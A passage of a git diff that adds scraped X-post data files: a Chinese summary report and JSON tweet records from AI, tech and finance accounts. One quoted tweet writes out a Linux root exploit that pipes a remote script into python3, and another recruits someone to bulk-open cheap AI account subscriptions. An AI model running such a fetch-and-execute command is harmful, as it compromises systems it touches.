10 日结束。\n[原文链接](https://x.com/realNyarime/status/2049765382433755229)\n\n**[2026-04-30T07:35:26+00:00]**\n> 深飘新工作:AI账号订阅工程师 寻找负责批量化开通低价渠道的,维护稳定性和可用性,需要有经验的!!\n[原文链接](https://x.com/realNyarime/status/2049754484071629206)\n\n**[2026-04-30T06:28:55+00:00]**\n> 看到Xint Code研究团队放出的CVE-2026-31431简直是王炸,换句话说通杀所有Linux发行版,致使低权限账户获得root权限: curl https://copy.fail/exp | python3 && su CVE-2026-31431 建议尽快更新系统,事态紧急可以先打个补丁 echo \"install algif_aead /bin/false\" > /etc/modp…\n[原文链接](https://x.com/realNyarime/status/2049737746563158361)\n\n**[2026-04-30T04:27:38+00:00]**\n> 本质上是个套壳的浏览器,通过MitM、内置的DoH和自签名根证书(Scholar Root CA v1 和 Scholar Service V2)信任劫持实现流量引导,并且有实时清理DOM元素的能力 例如:维基百科的首页,新闻动态、你知道吗全部被动态清零,YouTube整个/watch都是被屏蔽的,只允许看指定的博主的视频,至于http://google.com也不是全白名单 专用 DoH 服务…\n[原文链接](https://x.com/realNyarime/status/2049707224940089709)\n\n**[2026-04-30T03:30:29+00:00]**\n> 昨晚因发布GPT的活动内容导致了冻结 以后还是不发这类促销活动了,以免再发生类似的事 在申诉后的12小时,登录过后要求我删除那篇帖子,在删除过后就恢复了 这类内容烦请移步奶昔论坛 感谢多位推友的关心及问候,谢谢你们。\n[原文链接](https://x.com/realNyarime/status/2049692840901652531)\n\n---\n", + "monthly_analysis_md": "# X平台资讯深度分析报告\n\n**报告日期**: 2026-05-01T19:38:36.469180+00:00\n**分析账号**: 44个 | **活跃账号**: 34个 | **推文总量**: 478条\n\n---\n\n## 一、总体概览\n\n- 本报告基于 X 关注列表近30天 RSS 数据自动生成。\n- 默认口径:按账号聚合、按推文主题词粗分层。\n\n## 二、主题分布\n\n- **其他**:321 条\n- **模型能力**:113 条\n- **算力与芯片**:23 条\n- **交易与市场**:16 条\n- **投融资与并购**:5 条\n\n## 三、活跃账号 Top10\n\n- @pmarca: 20 条\n- @jason: 20 条\n- @sama: 20 条\n- @lxfater: 20 条\n- @GoSailGlobal: 20 条\n- @paulg: 20 条\n- @runes_leo: 20 条\n- @HarryStebbings: 20 条\n- @realNyarime: 20 条\n- @dingyi: 20 条\n\n## 四、代表性推文\n\n- @GaryMarcus | 2026-05-01T19:28:41+00:00\n - If you think you are going to get alignment out of LLMs you are sadly mistaken. If you live in a society in which people are rolling out LLMs at massive scale, without a robust so…\n - https://x.com/GaryMarcus/status/2050296366161940584\n- @pmarca | 2026-05-01T19:26:58+00:00\n - Important, and obviously true. https://psyche.co/ideas/have-online-worlds-become-the-last-free-places-for-children\n - https://x.com/pmarca/status/2050295934920302777\n- @Stv_Lynn | 2026-05-01T18:47:37+00:00\n - Media\n - https://x.com/Stv_Lynn/status/2050286033552736527\n- @jason | 2026-05-01T18:43:18+00:00\n - Enjoyed visiting MSG South in the seventh borough, Atlanta, last night… see y’all in the sixth borough (Philly) where we will beat the @sixers in six games @GovernorShapiro @david…\n - https://x.com/jason/status/2050284947345486290\n- @GaryMarcus | 2026-05-01T18:41:17+00:00\n - AI and GDP - what does it mean? Sure, AI is “contributing” to GDP — but @davidsacks really nails it below, “Paying people to dig holes and fill them back up increases GDP, as it i…\n - https://x.com/GaryMarcus/status/2050284439343862266\n- @CuiMao | 2026-05-01T18:31:06+00:00\n - 哈哈 @OpenAI 官号换掉了banner了 很明显,他们想再一次用这种画风重新走一遍当时4o宫崎骏现象级爆款。难,难啊。\n - https://x.com/CuiMao/status/2050281878322811194\n- @0xAA_Science | 2026-05-01T18:31:03+00:00\n - 一直想要个越野摩托车,这次张雪出了 MX250,支持一下。\n - https://x.com/0xAA_Science/status/2050281865245024365\n- @jason | 2026-05-01T18:25:15+00:00\n - Bill, the Knicks have won the east\n - https://x.com/jason/status/2050280406461677908\n- @GaryMarcus | 2026-05-01T18:22:55+00:00\n - One of the things I hate the most about this site is the consistent lack of nuance. That’s why everything is an argument, and progress here is so rare.\n - https://x.com/GaryMarcus/status/2050279819347448258\n- @GaryMarcus | 2026-05-01T18:21:24+00:00\n - I have many beefs with Dario and don’t trust him or his hype — but he has certainly eaten OpenAI’s lunch, despite their immense initial lead. Maybe “clown” isn’t the right word he…\n - https://x.com/GaryMarcus/status/2050279436717785406\n- @pmarca | 2026-05-01T18:08:02+00:00\n - Concerning.\n - https://x.com/pmarca/status/2050276070952517767\n- @GaryMarcus | 2026-05-01T18:04:30+00:00\n - Meta is basically Black Mirror incarnate.\n - https://x.com/GaryMarcus/status/2050275183223857462\n- @GaryMarcus | 2026-05-01T18:04:01+00:00\n - “Marcus’ specific point about coding is structurally important: a model that produces code which compiles and passes the tests it was given is not the same as a model that produce…\n - https://x.com/GaryMarcus/status/2050275059361792137\n- @sama | 2026-05-01T18:01:58+00:00\n - you know what all of these \"which is better\" polls are silly use codex or claude code, whatever works best for you i am grateful we live in a time with such amazing tools, and gra…\n - https://x.com/sama/status/2050274547061129577\n- @liuliu | 2026-05-01T17:33:05+00:00\n - What's harder for outsiders to understand is the falling of Deep Research inside @GeminiApp. On the other hand, Deep Research in @OpenAI is improving. Even so, nothing matches wha…\n - https://x.com/liuliu/status/2050267276893708414\n- @GaryMarcus | 2026-05-01T17:30:46+00:00\n - Elon Musk, Sam Altman, the future of humanity, and … goblins. Terrific interview @theinformation with @rocketalignment https://www.youtube.com/live/zh70d6CyuCo?si=WIZJnwKnYEy5Pugl\n - https://x.com/GaryMarcus/status/2050266692732014689\n- @charliebilello | 2026-05-01T17:18:23+00:00\n - Last 10 Years NVIDIA $NVDA: +22,875% Bitcoin $BTC: +17,205% $AMD: +10,030% Tesla $TSLA: +2,362% Apple $AAPL: +1,233% Google $GOOGL: +999% Netflix $NFLX: +932% Microsoft $MSFT: +84…\n - https://x.com/charliebilello/status/2050263578188333549\n- @Pluvio9yte | 2026-05-01T17:15:15+00:00\n - Damn!确实如此,所有AI编程工具都在卷模型智能,但现在满足基本的生产力了,转而让人崩溃的根本不是模型笨,是它每次开会话都失忆😅 AGENTS.md塞不下100万token的领域知识, RAG搜不到\"未知的未知\", 我自己维护Skills维护到想吐。 在公司里,新人入职花两周pair一下就能内化领域知识。 现在跟AI协作,每个新session都是\"新人第…\n - https://x.com/Pluvio9yte/status/2050262789256859872\n- @Pluvio9yte | 2026-05-01T17:07:00+00:00\n - 说个暴论,这个一百多万阅读帖子下的评论区里说\"Claude Code杀死了我的大脑\",其实90%搞反了因果🤯🤯🤯 我自己用CC大半年,直接把省下来的执行时间全砸在了架构设计上,脑子不但没退化反而比以前转得更快 以前写代码,80%时间花在执行(查文档、写代码、修bug),20%花在设计。现在执行交给Claude或者Codex了,只有两种结果: 1. 如果把省…\n - https://x.com/Pluvio9yte/status/2050260712858210516\n- @charliebilello | 2026-05-01T17:03:07+00:00\n - #FF @PeterMallouk, a great follow!\n - https://x.com/charliebilello/status/2050259734930800740\n\n---\n\n*本报告由系统自动生成,供月度复盘使用。*\n", + "paths": { + "tweet_summary_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/推文汇总_202605.md", + "monthly_analysis_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/月度深度分析_202605.md" + } +} \ No newline at end of file diff --git a/data/x_brief/latest_raw.json b/data/x_brief/latest_raw.json new file mode 100644 index 0000000..fbaf465 --- /dev/null +++ b/data/x_brief/latest_raw.json @@ -0,0 +1,5045 @@ +{ + "generated_at": "2026-05-01T19:38:36.469180+00:00", + "report_type": "weekly", + "input": { + "watchlist_path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/简报配置.md", + "watchers": [ + { + "handle": "karpathy", + "name": "Andrej Karpathy" + }, + { + "handle": "sama", + "name": "Sam Altman" + }, + { + "handle": "DarioAmodei", + "name": "Dario Amodei" + }, + { + "handle": "AravSrinivas", + "name": "Aravind Srinivas" + }, + { + "handle": "AndrewYNg", + "name": "Andrew Ng" + }, + { + "handle": "cursor_ai", + "name": "Cursor" + }, + { + "handle": "ylecun", + "name": "Yann LeCun" + }, + { + "handle": "JeffDean", + "name": "Jeff Dean" + }, + { + "handle": "soumithchintala", + "name": "Soumith Chintala" + }, + { + "handle": "gregbrockman", + "name": "Greg Brockman" + }, + { + "handle": "GaryMarcus", + "name": "Gary Marcus" + }, + { + "handle": "elonmusk", + "name": "Elon Musk" + }, + { + "handle": "paulg", + "name": "Paul Graham" + }, + { + "handle": "naval", + "name": "Naval Ravikant" + }, + { + "handle": "pmarca", + "name": "Marc Andreessen" + }, + { + "handle": "david_tiantian", + "name": "David Tian Wang" + }, + { + "handle": "morganhousel", + "name": "Morgan Housel" + }, + { + "handle": "eladgil", + "name": "Elad Gil" + }, + { + "handle": "DavidSacks", + "name": "David Sacks" + }, + { + "handle": "HarryStebbings", + "name": "Harry Stebbings" + }, + { + "handle": "jason", + "name": "Jason Calacanis" + }, + { + "handle": "charliebilello", + "name": "Charlie Bilello" + }, + { + "handle": "WarriorTrading", + "name": "Warrior Trading" + }, + { + "handle": "CryptoCred", + "name": "Credible Crypto" + }, + { + "handle": "AltcoinBuzz", + "name": "AltcoinBuzz" + }, + { + "handle": "svwang1", + "name": "王川(硅谷)" + }, + { + "handle": "bozhou_ai", + "name": "泊舟" + }, + { + "handle": "lxfater", + "name": "铁锤人" + }, + { + "handle": "berryxia", + "name": "Berryxia" + }, + { + "handle": "Pluvio9yte", + "name": "雪踏乌云" + }, + { + "handle": "liuliu", + "name": "刘进" + }, + { + "handle": "CuiMao", + "name": "CuiMao" + }, + { + "handle": "0xAA_Science", + "name": "0xAA" + }, + { + "handle": "dingyi", + "name": "Ding" + }, + { + "handle": "GoSailGlobal", + "name": "Jason Zhu" + }, + { + "handle": "frxiaobei", + "name": "凡人小北" + }, + { + "handle": "gkxspace", + "name": "余温" + }, + { + "handle": "Stv_Lynn", + "name": "Steven Lynn" + }, + { + "handle": "chuxiaeth", + "name": "初夏" + }, + { + "handle": "二级炒家", + "name": "二级炒家" + }, + { + "handle": "wolfyxbt", + "name": "杀破狼" + }, + { + "handle": "runes_leo", + "name": "Leo" + }, + { + "handle": "oranges", + "name": "比特币橙子" + }, + { + "handle": "realNyarime", + "name": "奶昔" + } + ], + "days": 7, + "per_account_limit": 80 + }, + "output": { + "description": "关注博主近一周推文", + "tweet_window_days": 7, + "tweet_count": 478 + }, + "period": { + "days": 7, + "start_utc": "2026-04-24T19:37:19.444626+00:00", + "end_utc": "2026-05-01T19:38:36.469180+00:00", + "month_tag": "202605" + }, + "overview": { + "total_accounts": 44, + "active_accounts": 34, + "total_tweets": 478, + "failed_accounts": 3, + "source_hits": { + "nitter": 40 + }, + "source_errors": { + "snscrape": 3, + "nitter": 3, + "rsshub": 3 + } + }, + "accounts": [ + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "DarioAmodei", + "account": "@DarioAmodei", + "name": "Dario Amodei", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 7, + "error": "", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 2, + "error": "", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 12, + "error": "", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 4, + "error": "", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "gregbrockman", + "account": "@gregbrockman", + "name": "Greg Brockman", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 16, + "error": "", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "david_tiantian", + "account": "@david_tiantian", + "name": "David Tian Wang", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 8, + "error": "", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 17, + "error": "", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "WarriorTrading", + "account": "@WarriorTrading", + "name": "Warrior Trading", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 1, + "error": "", + "source": "nitter" + }, + { + "handle": "AltcoinBuzz", + "account": "@AltcoinBuzz", + "name": "AltcoinBuzz", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 0, + "error": "", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 8, + "error": "", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 3, + "error": "", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 19, + "error": "", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 18, + "error": "", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 16, + "error": "", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 13, + "error": "", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 9, + "error": "", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 10, + "error": "", + "source": "nitter" + }, + { + "handle": "二级炒家", + "account": "@二级炒家", + "name": "二级炒家", + "category": "", + "score": "", + "skip_reason": "invalid_handle_for_nitter", + "status": "skipped", + "tweets_count": 0, + "error": "invalid_handle_for_nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 12, + "error": "", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + }, + { + "handle": "oranges", + "account": "@oranges", + "name": "比特币橙子", + "category": "", + "score": "", + "skip_reason": "", + "status": "error", + "tweets_count": 0, + "error": "snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable", + "source": "none" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "category": "", + "score": "", + "skip_reason": "", + "status": "ok", + "tweets_count": 20, + "error": "", + "source": "nitter" + } + ], + "tweets": [ + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "If you think you are going to get alignment out of LLMs you are sadly mistaken.\n\nIf you live in a society in which people are rolling out LLMs at massive scale, without a robust solution to alignment (or even managing gremlins) you’re probably fucked.\n\nResist the proliferation of LLMs, before it’s too late.", + "url": "https://x.com/GaryMarcus/status/2050296366161940584", + "published_at": "2026-05-01T19:28:41+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Important, and obviously true. https://psyche.co/ideas/have-online-worlds-become-the-last-free-places-for-children", + "url": "https://x.com/pmarca/status/2050295934920302777", + "published_at": "2026-05-01T19:26:58+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "Media", + "url": "https://x.com/Stv_Lynn/status/2050286033552736527", + "published_at": "2026-05-01T18:47:37+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Enjoyed visiting MSG South in the seventh borough, Atlanta, last night… see y’all in the sixth borough (Philly) where we will beat the @sixers in six games \n\n@GovernorShapiro @david_adelman care to be my some of those nasty cheesesteaks for some bagels?! 😂\n\n[ sorry @celtics, you can’t make it out of the first round! ] https://x.com/BattleRapBum/status/2050204814026457495/video/1", + "url": "https://x.com/jason/status/2050284947345486290", + "published_at": "2026-05-01T18:43:18+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "AI and GDP - what does it mean?\n\nSure, AI is “contributing” to GDP — but @davidsacks really nails it below, “Paying people to dig holes and fill them back up increases GDP, as it is currently measured, even though that activity has no value.”\n\nIn the case of AI, GDP is going up because of *investments* in AI infrastructure, but not because users in general are getting Return on Investment (most haven’t, so far, per multiple studies).\n\nThe future of our nation doesn’t rest on building data centers; it rests on building AI that is *good enough to consistently add value for its customers*. \n\nIf it doesn’t, all the building of data centers will turn out to have been an enormous black hole, temporarily good for GDP but of little lasting value.", + "url": "https://x.com/GaryMarcus/status/2050284439343862266", + "published_at": "2026-05-01T18:41:17+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "哈哈 @OpenAI 官号换掉了banner了\n很明显,他们想再一次用这种画风重新走一遍当时4o宫崎骏现象级爆款。难,难啊。", + "url": "https://x.com/CuiMao/status/2050281878322811194", + "published_at": "2026-05-01T18:31:06+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "一直想要个越野摩托车,这次张雪出了 MX250,支持一下。", + "url": "https://x.com/0xAA_Science/status/2050281865245024365", + "published_at": "2026-05-01T18:31:03+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Bill, the Knicks have won the east", + "url": "https://x.com/jason/status/2050280406461677908", + "published_at": "2026-05-01T18:25:15+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "One of the things I hate the most about this site is the consistent lack of nuance.\n\nThat’s why everything is an argument, and progress here is so rare.", + "url": "https://x.com/GaryMarcus/status/2050279819347448258", + "published_at": "2026-05-01T18:22:55+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "I have many beefs with Dario and don’t trust him or his hype — but he has certainly eaten OpenAI’s lunch, despite their immense initial lead.\n\nMaybe “clown” isn’t the right word here.", + "url": "https://x.com/GaryMarcus/status/2050279436717785406", + "published_at": "2026-05-01T18:21:24+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Concerning.", + "url": "https://x.com/pmarca/status/2050276070952517767", + "published_at": "2026-05-01T18:08:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Meta is basically Black Mirror incarnate.", + "url": "https://x.com/GaryMarcus/status/2050275183223857462", + "published_at": "2026-05-01T18:04:30+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Marcus’ specific point about coding is structurally important: a model that produces code which compiles and passes the tests it was given is not the same as a model that produces correct, secure, maintainable, well-architected software. The first is verifiable in seconds; the second requires the kind of judgement that has been the historical bottleneck on engineering productivity.\n\n[OpenAI President Greg] Brockman acknowledges the gap, even as he argues it is closing. “The technology we have right now is very jagged,” he said in the Big Technology interview. “It is absolutely superhuman at many tasks. When it comes to writing code, those kinds of things, the AI can just do it. But there’s some very basic tasks that a human can do that our AI still struggles with.”", + "url": "https://x.com/GaryMarcus/status/2050275059361792137", + "published_at": "2026-05-01T18:04:01+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "you know what\n\nall of these \"which is better\" polls are silly\n\nuse codex or claude code, whatever works best for you\n\ni am grateful we live in a time with such amazing tools, and grateful there is a choice", + "url": "https://x.com/sama/status/2050274547061129577", + "published_at": "2026-05-01T18:01:58+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "What's harder for outsiders to understand is the falling of Deep Research inside @GeminiApp. On the other hand, Deep Research in @OpenAI is improving. Even so, nothing matches what Deep Research used to be around this time last year. It is a sad product story.", + "url": "https://x.com/liuliu/status/2050267276893708414", + "published_at": "2026-05-01T17:33:05+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Elon Musk, Sam Altman, the future of humanity, and … goblins.\n\nTerrific interview @theinformation with @rocketalignment \n\nhttps://www.youtube.com/live/zh70d6CyuCo?si=WIZJnwKnYEy5Pugl", + "url": "https://x.com/GaryMarcus/status/2050266692732014689", + "published_at": "2026-05-01T17:30:46+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Last 10 Years\nNVIDIA $NVDA: +22,875%\nBitcoin $BTC: +17,205%\n$AMD: +10,030%\nTesla $TSLA: +2,362%\nApple $AAPL: +1,233%\nGoogle $GOOGL: +999%\nNetflix $NFLX: +932%\nMicrosoft $MSFT: +844%\nAmazon $AMZN: +717%\nMeta: $META: +425%\nS&P 500 $SPY: +312%\nGold $GLD: +245%\nUS Inflation: +39%", + "url": "https://x.com/charliebilello/status/2050263578188333549", + "published_at": "2026-05-01T17:18:23+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "Damn!确实如此,所有AI编程工具都在卷模型智能,但现在满足基本的生产力了,转而让人崩溃的根本不是模型笨,是它每次开会话都失忆😅\n\nAGENTS.md塞不下100万token的领域知识,\nRAG搜不到\"未知的未知\",\n我自己维护Skills维护到想吐。\n\n在公司里,新人入职花两周pair一下就能内化领域知识。\n现在跟AI协作,每个新session都是\"新人第一天\"——而且是个永远不会转正的新人。这个gap确实没被好的工具解决。\n\n如果有个工具能让用户持续喂入领域知识,且这些知识真正内化到推理里而不只是RAG式的检索拼接,那比现有方案高一个维度。至少目前还没看到谁把这件事做好了。", + "url": "https://x.com/Pluvio9yte/status/2050262789256859872", + "published_at": "2026-05-01T17:15:15+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "说个暴论,这个一百多万阅读帖子下的评论区里说\"Claude Code杀死了我的大脑\",其实90%搞反了因果🤯🤯🤯\n\n我自己用CC大半年,直接把省下来的执行时间全砸在了架构设计上,脑子不但没退化反而比以前转得更快\n\n以前写代码,80%时间花在执行(查文档、写代码、修bug),20%花在设计。现在执行交给Claude或者Codex了,只有两种结果:\n\n1. 如果把省下的时间也一起交出去,只写prompt按Accept,那就跟刷老虎机没区别,退化是必然的\n\n2. 但是把省下的时间花在架构设计和code review上,认知负荷会不降反升\n\n简单说,AI干掉的是执行层重复劳动,对设计层的要求反而更高了。产出速度快了,犯架构错误的代价会成倍放大。\n\n这不是\"AI让人变笨\"的问题,是工程实践有没有跟上工具进化的问题。没有测试、没有review、没有架构思考,AI越快翻车越快,脑子也会越来越锈住。", + "url": "https://x.com/Pluvio9yte/status/2050260712858210516", + "published_at": "2026-05-01T17:07:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "#FF @PeterMallouk, a great follow!", + "url": "https://x.com/charliebilello/status/2050259734930800740", + "published_at": "2026-05-01T17:03:07+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "比我还抽象,刚才刷抖音,刷到个一个女的说,她自己用一个月的时间从什么都不懂的 AI 白痴,通过她的这套学习方法论,拿到了中厂的agent工程师 offer 😅😅😅😅,评论区一堆人求资料,\n这个逼社会太疯狂了,我已经看不懂了。", + "url": "https://x.com/CuiMao/status/2050246075219693922", + "published_at": "2026-05-01T16:08:50+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "我发现 Cursor 额度还挺耐用的,使劲蹬才用掉了 $150,这 $10,000 得用到什么时候?\n看起来只有跑类似 auto research 的循环任务才能消耗掉这些 token 了!", + "url": "https://x.com/0xAA_Science/status/2050244250563182801", + "published_at": "2026-05-01T16:01:35+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "目前 WTF AI 讨论群已经 700 